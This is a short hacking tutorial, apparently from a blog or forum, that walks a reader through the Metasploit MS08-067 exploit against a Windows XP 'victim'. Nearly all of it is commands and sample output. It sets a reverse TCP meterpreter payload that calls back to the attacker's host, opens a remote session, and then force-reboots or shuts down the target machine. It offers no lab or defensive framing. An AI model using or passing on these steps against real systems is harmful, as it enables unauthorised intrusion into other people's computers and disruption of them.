Reboot Victim’s System

Follow this steps, to reboot your victim’s machine

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*


*Now, Set The Local Host – hacker’s local ip address*
msf exploit (ms_08_067_netapi) > set LHOST
*The output will be: LHOST =>*


*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_08_067_netapi) > set RHOST
*The output will be: RHOST =>*


*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the whole details about our exploit process*


Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-10.11 14:20:19 +0300

meterpreter >


For rebooing the remote PC, type:
meterpreter > reboot -f


For shuting down the remote PC, type:
meterpreter > shell
*You will get this output*
Process 768 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Mircorost Corp.



Let’s run the command:
C:\WINDOWS\system32> shutdown -f /r /t 10
*We will get this output*
shutdown -f /r /t 10

*After a few sec, we will get this output*
[*] – Meterpreter session 1 closed. Reason: Died


Now, let’s hit CTRL+C to terminate the channel:
*We will get this output*
Terminate channel 1? [y/N]
*Let’s hit “y” and enter*




Here is an example by Gamer Forever